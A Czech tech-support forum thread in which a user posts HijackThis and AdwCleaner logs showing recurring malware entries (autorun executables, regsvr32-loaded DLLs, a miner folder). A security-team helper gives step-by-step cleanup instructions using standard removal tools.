Dobrý den, dnes sem prováděl pravidelnou kontrolu přes malwarebyte-anti malware a bohužel mi zjistil nějakých 25 trojanů, klasicky sem po odstranění virů restartoval pc a poté všechno projel ještě jednou k mému překvapení tam byli zase. Prosím o kontrolu logu.
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 19:21:19, on 14.03.2017
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.14393.0953)
Boot mode: Normal
Running processes:
C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
C:\Users\Nekut\AppData\Local\Microsoft\OneDrive\OneDrive.exe
C:\Users\Nekut\AppData\Roaming\D3B96F\FC440D.exe
C:\Users\Nekut\AppData\Local\Opwics\nhspg.exe
C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\acwebbrowser.exe
C:\Users\Nekut\AppData\Roaming\D3B96F\fc440d.exe
C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\acwebbrowser.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\acwebbrowser.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\WINDOWS\SysWOW64\regsvr32.exe
C:\WINDOWS\SysWOW64\regsvr32.exe
C:\Users\Nekut\Downloads\HijackThis.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,SearchAssistant = www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,Default_Search_URL = www.google.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = %11%\blank.htm
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_66\bin\ssv.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_66\bin\jp2ssv.dll
O4 - HKLM\..\Run: [D3B96F] %APPDATA%\D3B96F\FC440D.exe
O4 - HKLM\..\Run: [Autodesk Desktop App] "C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe" -tray
O4 - HKLM\..\Run: [SDTray] "C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe"
O4 - HKLM\..\Run: [4StoryPrePatch] C:\Program Files (x86)\GameforgeLive\Games\CZE_ces\4Story\PrePatch.exe
O4 - HKLM\..\Run: [GameforgeLive] "C:\Program Files (x86)\GameforgeLive\gfl_client.exe" -autostart
O4 - HKCU\..\Run: [OneDrive] "C:\Users\Nekut\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
O4 - HKCU\..\Run: [DAEMON Tools Lite Automount] "C:\Program Files\DAEMON Tools Lite\DTAgent.exe" -autorun
O4 - HKCU\..\Run: [BitTorrent] "C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe" /MINIMIZED
O4 - HKCU\..\Run: [Steam] "C:\Program Files (x86)\Steam\steam.exe" -silent
O4 - HKCU\..\Run: [D3B96F] %APPDATA%\D3B96F\FC440D.exe
O4 - HKCU\..\Run: [Autodesk Sync] C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - HKCU\..\Run: [SpybotPostWindows10UpgradeReInstall] "C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe"
O4 - HKCU\..\Run: [Opwics] C:\Users\Nekut\AppData\Local\Opwics\nhspg.exe
O4 - HKCU\..\Run: [Ibkjsoft] C:\Windows\SysWOW64\regsvr32.exe C:\Users\Nekut\AppData\Local\Opwics\bzcjicbl.dll
O4 - HKCU\..\Run: [Ejcztion] regsvr32.exe C:\Users\Nekut\AppData\Local\Ejcztion\hbsjodvp.dll
O4 - HKUS\S-1-5-19\..\Run: [OneDriveSetup] C:\Windows\SysWOW64\OneDriveSetup.exe /thfirstsetup (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [OneDriveSetup] C:\Windows\SysWOW64\OneDriveSetup.exe /thfirstsetup (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\Run: [Autodesk Sync] C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [Autodesk Sync] C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe (User 'Default user')
O4 - Global Startup: O&O Defrag Tray.lnk = ?
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - Trusted IP range: http://192.168.10.1
O15 - ESC Trusted IP range: http://192.168.10.1
O18 - Protocol: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O18 - Protocol: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O20 - Winlogon Notify: SDWinLogon - SDWinLogon.dll (file missing)
O23 - Service: Autodesk Desktop App Service (AdAppMgrSvc) - Autodesk Inc. - C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
O23 - Service: @%SystemRoot%\system32\DiagSvcs\DiagnosticsHub.StandardCollector.ServiceRes.dll,-1000 (diagnosticshub.standardcollector.service) - Unknown owner - C:\WINDOWS\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe (file missing)
O23 - Service: Disc Soft Lite Bus Service - Disc Soft Ltd - C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\WINDOWS\system32\fxssvc.exe (file missing)
O23 - Service: FlexNet Licensing Service 64 - Flexera Software LLC - C:\Program Files\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService64.exe
O23 - Service: Futuremark SystemInfo Service - Futuremark - C:\Program Files (x86)\Futuremark\SystemInfo\FMSISvc.exe
O23 - Service: Služba Google Update (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Služba Google Update (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Intel(R) Capability Licensing Service TCP IP Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe
O23 - Service: Intel(R) Security Assist Helper (isaHelperSvc) - Unknown owner - C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: LMIGuardianSvc - LogMeIn, Inc. - C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: nProtect GameGuard Service (npggsvc) - Unknown owner - C:\WINDOWS\system32\GameMon.des.exe (file missing)
O23 - Service: NVIDIA LocalSystem Container (NvContainerLocalSystem) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
O23 - Service: NVIDIA NetworkService Container (NvContainerNetworkService) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
O23 - Service: NVIDIA Display Container LS (NVDisplay.ContainerLocalSystem) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
O23 - Service: NVIDIA Wireless Controller Service - Unknown owner - C:\Program Files\NVIDIA Corporation\GeForce Experience Service\nvwirelesscontroller.exe (file missing)
O23 - Service: NVIDIA Telemetry Container (NvTelemetryContainer) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
O23 - Service: O&O Defrag (OODefragAgent) - O&O Software GmbH - C:\Program Files\OO Software\Defrag\oodag.exe
O23 - Service: Overwolf Updater Windows SCM (OverwolfUpdater) - Overwolf LTD - C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe
O23 - Service: Plusdax - Unknown owner - C:\ProgramData\\Plusdax\\Plusdax.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Spybot-S&D 2 Scanner Service (SDScannerService) - Safer-Networking Ltd. - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
O23 - Service: Spybot-S&D 2 Updating Service (SDUpdateService) - Safer-Networking Ltd. - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
O23 - Service: Spybot-S&D 2 Security Center Service (SDWSCService) - Safer-Networking Ltd. - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
O23 - Service: @%SystemRoot%\system32\SensorDataService.exe,-101 (SensorDataService) - Unknown owner - C:\WINDOWS\System32\SensorDataService.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: @%SystemRoot%\system32\TieringEngineService.exe,-702 (TieringEngineService) - Unknown owner - C:\WINDOWS\system32\TieringEngineService.exe (file missing)
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\WINDOWS\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-320 (WdNisSvc) - Unknown owner - C:\Program Files (x86)\Windows Defender\NisSrv.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-310 (WinDefend) - Unknown owner - C:\Program Files (x86)\Windows Defender\MsMpEng.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
--
End of file - 12804 bytes
Prosím o kontrolu logu Vyřešeno
- jaro3
- člen Security týmu
-
Guru Level 15
- Příspěvky: 43113
- Registrován: červen 07
- Bydliště: Jižní Čechy
- Pohlaví:
- Stav:
Offline
Re: Prosím o kontrolu logu
Stáhni si ATF Cleaner
Poklepej na ATF Cleaner.exe, klikni na select all found, poté:
-Když používáš Firefox (Mozzila), klikni na Firefox nahoře a vyber: Select All, poté klikni na Empty Selected.
-Když používáš Operu, klikni nahoře na Operu a vyber: Select All, poté klikni na Empty Selected. Poté klikni na Main (hlavní stránku ) a klikni na Empty Selected.
Po vyčištění klikni na Exit k zavření programu.
ATF-Cleaner je jednoduchý nástroj na odstranění historie z webového prohlížeče. Program dokáže odstranit cache, cookies, historii a další stopy po surfování na Internetu. Mezi podporované prohlížeče patří Internet Explorer, Firefox a Opera. Aplikace navíc umí odstranit dočasné soubory Windows, vysypat koš atd.
- Pokud používáš jen Google Chrome , tak ATF nemusíš použít.
Stáhni si TFC
http://www.geekstogo.com/forum/files/fi ... -oldtimer/
Otevři soubor a zavři všechny ostatní okna, Klikni na Start k zahájení procesu. Program by neměl trvat dlouho.
Poté by se měl PC restartovat, pokud ne , proveď sám.
Stáhni AdwCleaner (by Xplode
http://www.bleepingcomputer.com/download/adwcleaner/
http://www.adlice.com/downloadprogress/
Ulož si ho na svojí plochu
Ukonči všechny programy , okna a prohlížeče
Spusť program poklepáním a klikni na „Scan“
Po skenu klikni na „Logfile“ ,objeví se okno „Log Manager“ a pak poklepej na odpovídající log , který se otevře. ( jinak je uložen systémovem disku jako C:\AdwCleaner [C?].txt ), jeho obsah sem celý vlož.
a opět:
Stáhni si Malwarebytes' Anti-Malware
- Při instalaci odeber zatržítko u „Povolit bezplatnou zkušební verzi Malwarebytes' Anti-Malware Premium“
Nainstaluj a spusť ho
- na konci instalace se ujisti že máš zvoleny/zatrhnuty obě možnosti:
Aktualizace Malwarebytes' Anti-Malware a Spustit aplikaci Malwarebytes' Anti-Malware, pokud jo tak klikni na tlačítko konec
-Pokud není program aktuální , klikni na možnost „Aktualizovat nyní“ či „Opravit nyní“.
- bude nalezena aktualizace a nainstaluje se.
- poté klikni na Skenovat nyní
- po proběhnutí programu se ti objeví hláška vpravo dole, tak klikni na Uložit výsledky a vyber zkopírovat do schránky a vlož sem celý log. Nebo klikni na „Textový soubor ( .txt)“ a log si ulož.
-jinak se log nachází zde: C:\ProgramData\Malwarebytes\Malwarebytes Anti-Malware\Logs
- po té klikni na tlačítko Dokončit, a program zavři křížkem vpravo nahoře.
(zatím nic nemaž!).
Pokud budou problémy , spusť v nouz. režimu.
Poklepej na ATF Cleaner.exe, klikni na select all found, poté:
-Když používáš Firefox (Mozzila), klikni na Firefox nahoře a vyber: Select All, poté klikni na Empty Selected.
-Když používáš Operu, klikni nahoře na Operu a vyber: Select All, poté klikni na Empty Selected. Poté klikni na Main (hlavní stránku ) a klikni na Empty Selected.
Po vyčištění klikni na Exit k zavření programu.
ATF-Cleaner je jednoduchý nástroj na odstranění historie z webového prohlížeče. Program dokáže odstranit cache, cookies, historii a další stopy po surfování na Internetu. Mezi podporované prohlížeče patří Internet Explorer, Firefox a Opera. Aplikace navíc umí odstranit dočasné soubory Windows, vysypat koš atd.
- Pokud používáš jen Google Chrome , tak ATF nemusíš použít.
Stáhni si TFC
http://www.geekstogo.com/forum/files/fi ... -oldtimer/
Otevři soubor a zavři všechny ostatní okna, Klikni na Start k zahájení procesu. Program by neměl trvat dlouho.
Poté by se měl PC restartovat, pokud ne , proveď sám.
Stáhni AdwCleaner (by Xplode
http://www.bleepingcomputer.com/download/adwcleaner/
http://www.adlice.com/downloadprogress/
Ulož si ho na svojí plochu
Ukonči všechny programy , okna a prohlížeče
Spusť program poklepáním a klikni na „Scan“
Po skenu klikni na „Logfile“ ,objeví se okno „Log Manager“ a pak poklepej na odpovídající log , který se otevře. ( jinak je uložen systémovem disku jako C:\AdwCleaner [C?].txt ), jeho obsah sem celý vlož.
a opět:
Stáhni si Malwarebytes' Anti-Malware
- Při instalaci odeber zatržítko u „Povolit bezplatnou zkušební verzi Malwarebytes' Anti-Malware Premium“
Nainstaluj a spusť ho
- na konci instalace se ujisti že máš zvoleny/zatrhnuty obě možnosti:
Aktualizace Malwarebytes' Anti-Malware a Spustit aplikaci Malwarebytes' Anti-Malware, pokud jo tak klikni na tlačítko konec
-Pokud není program aktuální , klikni na možnost „Aktualizovat nyní“ či „Opravit nyní“.
- bude nalezena aktualizace a nainstaluje se.
- poté klikni na Skenovat nyní
- po proběhnutí programu se ti objeví hláška vpravo dole, tak klikni na Uložit výsledky a vyber zkopírovat do schránky a vlož sem celý log. Nebo klikni na „Textový soubor ( .txt)“ a log si ulož.
-jinak se log nachází zde: C:\ProgramData\Malwarebytes\Malwarebytes Anti-Malware\Logs
- po té klikni na tlačítko Dokončit, a program zavři křížkem vpravo nahoře.
(zatím nic nemaž!).
Pokud budou problémy , spusť v nouz. režimu.
Při práci s programy HJT, ComboFix,MbAM, SDFix aj. zavřete všechny ostatní aplikace a prohlížeče!
Neposílejte logy do soukromých zpráv.Po dobu mé nepřítomnosti mě zastupuje memphisto , Žbeky a Orcus.
Pokud budete spokojeni , můžete podpořit naše forum:Podpora fóra
Neposílejte logy do soukromých zpráv.Po dobu mé nepřítomnosti mě zastupuje memphisto , Žbeky a Orcus.
Pokud budete spokojeni , můžete podpořit naše forum:Podpora fóra
Re: Prosím o kontrolu logu
# AdwCleaner v6.044 - Log vytvořen 15/03/2017 v 17:24:58
# Aktualizováno dne 28/02/2017 z Malwarebytes
# Databáze : 2017-03-15.2 [Server]
# Operační systém : Windows 10 Home (X64)
# Uživatelské jméno : Nekut - DESKTOP-S3S217H
# Spuštěno z : C:\Users\Nekut\Desktop\AdwCleaner.exe
# Mod: Skenování
# Podpora : https://www.malwarebytes.com/support
***** [ Služby ] *****
Služba nalezena: Plusdax
***** [ Složky ] *****
Složka nalezena: C:\Users\Nekut\AppData\Local\globalUpdate
Složka nalezena: C:\Users\Nekut\AppData\Roaming\cpuminer
Složka nalezena: C:\Users\Nekut\AppData\Roaming\ppslog
Složka nalezena: C:\Program Files\NixSrv
Složka nalezena: C:\ProgramData\AVG Security Toolbar
Složka nalezena: C:\ProgramData\Uniblue
Složka nalezena: C:\ProgramData\Plusdaxs
Složka nalezena: C:\ProgramData\Plusdax
Složka nalezena: C:\Program Files (x86)\globalUpdate
Složka nalezena: C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\databases\chrome-extension_akaelkiagnbfcccfnmbimdbplecgbikh_0
***** [ Soubory ] *****
Soubor nalezen: C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
Soubor nalezen: C:\Users\Nekut\AppData\Roaming\Installer.dat
Soubor nalezen: C:\Users\Nekut\AppData\Roaming\Main.dat
***** [ DLL ] *****
Nebyly nalezeny žádné škodlivé DLL.
***** [ WMI ] *****
Nebyly nalezeny žádné škodlivé klíče.
***** [ Zástupci ] *****
Žádný infikovaný zástupce nenalezen.
***** [ Naplánované úlohy ] *****
Žádná nebezpečná úloha nenalezena.
***** [ Registry ] *****
Klíč nalezen: HKLM\SOFTWARE\6734ebd2-f889-45db-86ff-4cf01bad675d
Klíč nalezen: HKLM\SOFTWARE\7fb7766b-64b0-4740-b3e0-8facee1c2b95
Klíč nalezen: HKLM\SOFTWARE\d5c55897-9fd9-4ce5-9991-7aca12b6be56
Klíč nalezen: HKLM\SOFTWARE\Classes\Installer\Features\0C776EBEBCBCFBE408892EE7B12517FC
Klíč nalezen: HKLM\SOFTWARE\Classes\Installer\Products\0C776EBEBCBCFBE408892EE7B12517FC
Klíč nalezen: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\0C776EBEBCBCFBE408892EE7B12517FC
Klíč nalezen: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\0C776EBEBCBCFBE408892EE7B12517FC
Klíč nalezen: [x64] HKLM\SOFTWARE\Classes\Installer\Features\0C776EBEBCBCFBE408892EE7B12517FC
Klíč nalezen: [x64] HKLM\SOFTWARE\Classes\Installer\Products\0C776EBEBCBCFBE408892EE7B12517FC
Klíč nalezen: HKLM\SOFTWARE\Classes\driverscanner
Klíč nalezen: HKLM\SOFTWARE\Classes\ppsmb
Klíč nalezen: [x64] HKLM\SOFTWARE\Classes\driverscanner
Klíč nalezen: [x64] HKLM\SOFTWARE\Classes\ppsmb
Klíč nalezen: HKLM\SOFTWARE\Classes\CLSID\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{A6D54287-7939-466A-8579-92546D946C8C}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{47A1DF02-BCE4-40C3-AE47-E3EA09A65E4A}
Klíč nalezen: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
Klíč nalezen: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B2BC04DF-EFBD-409A-95CA-36874E5AB92A}
Klíč nalezen: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
Klíč nalezen: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{5645E0E7-FC12-43BF-A6E4-F9751942B298}
Klíč nalezen: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}
Klíč nalezen: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{5E6A8DA1-5731-465B-B036-B9E16EF26CAC}
Klíč nalezen: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
Klíč nalezen: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
Klíč nalezen: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{B2BC04DF-EFBD-409A-95CA-36874E5AB92A}
Klíč nalezen: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
Klíč nalezen: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\GlobalUpdate
Klíč nalezen: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\PPStream
Klíč nalezen: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\INSTALLPATH\STATUS
Klíč nalezen: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\mtPlusdax
Klíč nalezen: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Installer
Klíč nalezen: HKCU\Software\GlobalUpdate
Klíč nalezen: HKCU\Software\PPStream
Klíč nalezen: HKCU\Software\INSTALLPATH\STATUS
Klíč nalezen: HKCU\Software\mtPlusdax
Klíč nalezen: HKLM\SOFTWARE\GlobalUpdate
Klíč nalezen: HKLM\SOFTWARE\SimpleFiles
Klíč nalezen: HKLM\SOFTWARE\SupDp
Klíč nalezen: HKLM\SOFTWARE\Uniblue
Klíč nalezen: HKLM\SOFTWARE\Uniblue\DriverScanner
Klíč nalezen: HKLM\SOFTWARE\SUPDP
Klíč nalezen: HKLM\SOFTWARE\mtPlusdax
Klíč nalezen: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SU
Klíč nalezen: [x64] HKCU\Software\GlobalUpdate
Klíč nalezen: [x64] HKCU\Software\PPStream
Klíč nalezen: [x64] HKCU\Software\INSTALLPATH\STATUS
Klíč nalezen: [x64] HKCU\Software\mtPlusdax
Klíč nalezen: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Internet Explorer\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}
Data nalezena: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] -
Klíč nalezen: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}
Data nalezena: HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] -
Klíč nalezen: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}
Data nalezena: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] -
Klíč nalezen: HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\mysearch.avg.com
